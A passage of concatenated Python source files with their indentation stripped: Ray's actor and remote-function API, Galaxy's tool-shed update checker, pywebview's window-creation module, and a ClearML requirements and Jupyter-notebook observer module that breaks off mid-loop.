namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
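    A minimal usage sketch (illustrative only; ``Counter`` is a hypothetical
    actor and ``ray.init()`` is assumed to have been called):
    .. code-block:: python
    @ray.remote
    class Counter:  # hypothetical named actor
        def __init__(self):
            self.n = 0
        def incr(self):
            self.n += 1
            return self.n
    counter = Counter.options(name="global_counter").remote()
    handle = ray.get_actor("global_counter")
    assert ray.get(handle.incr.remote()) == 1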
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
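    A minimal usage sketch (illustrative only; ``Worker`` is a hypothetical
    actor and ``ray.init()`` is assumed to have been called):
    .. code-block:: python
    @ray.remote
    class Worker:  # hypothetical actor
        def ping(self):
            return "pong"
    w = Worker.remote()
    assert ray.get(w.ping.remote()) == "pong"
    ray.kill(w)  # interrupts running tasks; atexit handlers are skipped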
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
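    A minimal usage sketch (illustrative only; ``slow`` is a hypothetical
    task and ``ray.init()`` is assumed to have been called):
    .. code-block:: python
    import time
    @ray.remote
    def slow():  # hypothetical long-running task
        time.sleep(3600)
    ref = slow.remote()
    ray.cancel(ref)
    try:
        ray.get(ref)
    except (ray.exceptions.TaskCancelledError, ray.exceptions.RayTaskError):
        pass  # cancelled before it started, or interrupted while running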
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
worker=None,
retry_exceptions=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(function_or_class, num_cpus, num_gpus,
memory, object_store_memory, resources,
accelerator_type, max_restarts,
max_task_retries, runtime_env)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
            the default is 4, and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns", "num_cpus", "num_gpus", "memory", "object_store_memory",
"resources", "accelerator_type", "max_calls", "max_restarts",
"max_task_retries", "max_retries", "runtime_env", "retry_exceptions"
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
retry_exceptions = kwargs.get("retry_exceptions")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
worker=worker,
retry_exceptions=retry_exceptions)
|
update_manager.py
|
"""
Determine if installed tool shed repositories have updates available in their respective tool sheds.
"""
import logging
import threading
from galaxy.util import string_as_bool
import tool_shed.util.shed_util_common as suc
from tool_shed.util import common_util
from galaxy.model.orm import and_
log = logging.getLogger( __name__ )
class UpdateManager( object ):
def __init__( self, app ):
self.app = app
self.sa_session = self.app.model.context.current
# Ideally only one Galaxy server process should be able to check for repository updates.
self.running = True
self.sleeper = Sleeper()
self.restarter = threading.Thread( target=self.__restarter )
self.restarter.start()
self.seconds_to_sleep = int( app.config.hours_between_check * 3600 )
def __restarter( self ):
log.info( 'Update manager restarter starting up...' )
while self.running:
flush_needed = False
for repository in self.sa_session.query( self.app.model.ToolShedRepository ) \
.filter( and_( self.app.model.ToolShedRepository.table.c.update_available == False,
self.app.model.ToolShedRepository.table.c.deleted == False ) ):
if self.check_for_update( repository ):
repository.update_available = True
self.sa_session.add( repository )
flush_needed = True
if flush_needed:
self.sa_session.flush()
self.sleeper.sleep( self.seconds_to_sleep )
        log.info( 'Update manager restarter shutting down...' )
def check_for_update( self, repository ):
tool_shed_url = suc.get_url_from_tool_shed( self.app, repository.tool_shed )
url = '%s/repository/check_for_updates?name=%s&owner=%s&changeset_revision=%s&from_update_manager=True' % \
( tool_shed_url, repository.name, repository.owner, repository.changeset_revision )
try:
text = common_util.tool_shed_get( self.app, tool_shed_url, url )
        except Exception:
# The required tool shed may be unavailable.
text = 'False'
return string_as_bool( text )
def shutdown( self ):
self.running = False
self.sleeper.wake()
class Sleeper( object ):
"""Provides a 'sleep' method that sleeps for a number of seconds *unless* the notify method is called (from a different thread)."""
def __init__( self ):
self.condition = threading.Condition()
def sleep( self, seconds ):
self.condition.acquire()
self.condition.wait( seconds )
self.condition.release()
def wake( self ):
self.condition.acquire()
self.condition.notify()
self.condition.release()
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
pywebview is a lightweight cross-platform wrapper around a webview component that allows displaying HTML content in its
own dedicated window. Works on Windows, OS X and Linux and is compatible with Python 2 and 3.
(C) 2014-2019 Roman Sirokov and contributors
Licensed under BSD license
http://github.com/r0x0r/pywebview/
"""
import logging
import sys
import os
import re
import threading
from uuid import uuid4
from proxy_tools import module_property
from webview.event import Event
from webview.guilib import initialize
from webview.util import _token, base_uri, parse_file_type, escape_string, make_unicode, escape_line_breaks, WebViewException
from webview.window import Window
from .localization import localization as original_localization
from .wsgi import Routing, StaticFiles, StaticResources
__all__ = (
# Stuff that's here
    'start', 'create_window', 'token', 'screens',
# From wsgi
'Routing', 'StaticFiles', 'StaticResources',
# From event
'Event',
# from util
'_token', 'base_uri', 'parse_file_type', 'escape_string', 'make_unicode',
'escape_line_breaks', 'WebViewException',
# from window
'Window',
)
logger = logging.getLogger('pywebview')
handler = logging.StreamHandler()
formatter = logging.Formatter('[pywebview] %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
log_level = logging.DEBUG if os.environ.get('PYWEBVIEW_LOG') == 'debug' else logging.INFO
logger.setLevel(log_level)
OPEN_DIALOG = 10
FOLDER_DIALOG = 20
SAVE_DIALOG = 30
DRAG_REGION_SELECTOR = '.pywebview-drag-region'
guilib = None
_debug = {
'mode': False
}
_user_agent = None
_multiprocessing = False
_http_server = False
token = _token
windows = []
def start(func=None, args=None, localization={}, gui=None, debug=False, http_server=False, user_agent=None):
"""
Start a GUI loop and display previously created windows. This function must
be called from a main thread.
:param func: Function to invoke upon starting the GUI loop.
:param args: Function arguments. Can be either a single value or a tuple of
values.
:param localization: A dictionary with localized strings. Default strings
and their keys are defined in localization.py.
:param gui: Force a specific GUI. Allowed values are ``cef``, ``qt``, or
``gtk`` depending on a platform.
:param debug: Enable debug mode. Default is False.
:param http_server: Enable built-in HTTP server. If enabled, local files
will be served using a local HTTP server on a random port. For each
window, a separate HTTP server is spawned. This option is ignored for
non-local URLs.
:param user_agent: Change user agent string. Not supported in EdgeHTML.
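    A minimal usage sketch (illustrative only; the title and URL are placeholders)::
        import webview
        window = webview.create_window('Hello', 'https://example.com')
        webview.start()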
"""
global guilib, _debug, _multiprocessing, _http_server, _user_agent
def _create_children(other_windows):
if not windows[0].shown.wait(10):
raise WebViewException('Main window failed to load')
for window in other_windows:
guilib.create_window(window)
_debug['mode'] = debug
_user_agent = user_agent
#_multiprocessing = multiprocessing
multiprocessing = False # TODO
_http_server = http_server
if multiprocessing:
from multiprocessing import Process as Thread
else:
from threading import Thread
original_localization.update(localization)
if threading.current_thread().name != 'MainThread':
raise WebViewException('This function must be run from a main thread.')
if len(windows) == 0:
raise WebViewException('You must create a window first before calling this function.')
guilib = initialize(gui)
for window in windows:
window._initialize(guilib, multiprocessing, http_server)
if len(windows) > 1:
t = Thread(target=_create_children, args=(windows[1:],))
t.start()
if func:
if args is not None:
if not hasattr(args, '__iter__'):
args = (args,)
t = Thread(target=func, args=args)
else:
t = Thread(target=func)
t.start()
guilib.create_window(windows[0])
def create_window(title, url=None, html=None, js_api=None, width=800, height=600, x=None, y=None,
resizable=True, fullscreen=False, min_size=(200, 100), hidden=False,
frameless=False, easy_drag=True,
minimized=False, on_top=False, confirm_close=False, background_color='#FFFFFF',
transparent=False, text_select=False):
"""
    Create a web view window using a native GUI. The window is displayed once the GUI loop is started with
    ``start()``; if the loop is already running (i.e. this is called from another thread after ``start()``),
    the window is shown immediately.
:param title: Window title
:param url: URL to load
:param width: window width. Default is 800px
    :param height: Window height. Default is 600px
    :param resizable: True if window can be resized, False otherwise. Default is True
:param fullscreen: True if start in fullscreen mode. Default is False
:param min_size: a (width, height) tuple that specifies a minimum window size. Default is 200x100
:param hidden: Whether the window should be hidden.
    :param frameless: Whether the window should be frameless (no title bar or border). Default is False.
:param easy_drag: Easy window drag mode when window is frameless.
:param minimized: Display window minimized
    :param on_top: Keep window above other windows (supported on Windows only)
:param confirm_close: Display a window close confirmation dialog. Default is False
:param background_color: Background color as a hex string that is displayed before the content of webview is loaded. Default is white.
:param text_select: Allow text selection on page. Default is False.
:param transparent: Don't draw window background.
:return: window object.
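    A minimal usage sketch (illustrative only; the title, URL and size are placeholders)::
        import webview
        window = webview.create_window('Example', 'https://example.com',
                                       width=1024, height=768)
        webview.start()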
"""
valid_color = r'^#(?:[0-9a-fA-F]{3}){1,2}$'
if not re.match(valid_color, background_color):
raise ValueError('{0} is not a valid hex triplet color'.format(background_color))
uid = 'master' if len(windows) == 0 else 'child_' + uuid4().hex[:8]
window = Window(uid, make_unicode(title), url, html,
width, height, x, y, resizable, fullscreen, min_size, hidden,
frameless, easy_drag, minimized, on_top, confirm_close, background_color,
js_api, text_select, transparent)
windows.append(window)
if threading.current_thread().name != 'MainThread' and guilib:
window._initialize(guilib, _multiprocessing, _http_server)
guilib.create_window(window)
return window
@module_property
def screens():
guilib = initialize()
screens = guilib.get_screens()
return screens
|
scriptinfo.py
|
import os
import sys
from copy import copy
from datetime import datetime
from functools import partial
from tempfile import mkstemp, gettempdir
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....config import deferred_config, VCS_WORK_DIR
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_detailed_import_report = deferred_config('development.detailed_import_report', False)
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
_ignore_packages = set()
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None, add_missing_installed_packages=False,
detailed_req_report=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
if add_missing_installed_packages and guess:
for k in guess:
if k not in reqs:
reqs[k] = guess[k]
return self.create_requirements_txt(reqs, local_pks, detailed=detailed_req_report)
except Exception as ex:
self._get_logger().warning("Failed auto-generating package requirements: {}".format(ex))
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules and 'tensorboardX' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None, detailed=None):
# write requirements.txt
if detailed is None:
detailed = ScriptRequirements._detailed_import_report
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# the exception is cudatoolkit which we want to log anyhow
if r.get('name') == 'cudatoolkit' and r.get('version'):
conda_requirements += '{0} {1} {2}\n'.format(r.get('name'), '==', r.get('version'))
continue
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
forced_packages = {}
ignored_packages = ScriptRequirements._ignore_packages
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
# noinspection PyProtectedMember
ignored_packages = Task._ignore_requirements | ignored_packages
except Exception:
pass
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
if k in ignored_packages or k.lower() in ignored_packages:
continue
version = v.version if v else None
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version is not None:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
requirements_txt += ScriptRequirements._make_req_line(k, version or None)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
requirements_txt += ScriptRequirements._make_req_line(k, forced_packages.get(k))
requirements_txt_packages_only = requirements_txt
if detailed:
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
if not v:
continue
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
        # make sure we do not exceed the size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _make_req_line(k, version):
requirements_txt = ''
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version and str(version or ' ').strip()[0].isdigit():
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
elif version and str(version).strip():
requirements_txt += '{0} {1}\n'.format(k, version)
else:
requirements_txt += '{0}\n'.format(k)
return requirements_txt
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
_store_notebook_artifact = deferred_config('development.store_jupyter_notebook_artifact', True)
@classmethod
def _get_logger(cls):
return get_logger("Repository Detection")
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception as ex:
cls._get_logger().warning('Could not read Jupyter Notebook: {}'.format(ex))
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
replace_ipython_display_pattern = re.compile(r'\n([ \t]*)display\(')
except Exception:
replace_ipython_pattern = None
replace_ipython_display_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None and local_jupyter_filename:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
if cls._store_notebook_artifact:
# also upload the jupyter notebook as artifact
task.upload_artifact(
name='notebook',
artifact_object=Path(local_jupyter_filename),
preview='See `notebook preview` artifact',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
wait_on_upload=True,
)
# noinspection PyBroadException
try:
from nbconvert.exporters import HTMLExporter # noqa
html, _ = HTMLExporter().from_filename(filename=local_jupyter_filename)
local_html = Path(gettempdir()) / 'notebook_{}.html'.format(task.id)
with open(local_html.as_posix(), 'wt', encoding="utf-8") as f:
f.write(html)
task.upload_artifact(
name='notebook preview', artifact_object=local_html,
preview='Click `FILE PATH` link',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
delete_after_upload=True,
wait_on_upload=True,
)
except Exception:
pass
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
if replace_ipython_display_pattern:
script_code = replace_ipython_display_pattern.sub(r'\n\g<1>print(', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
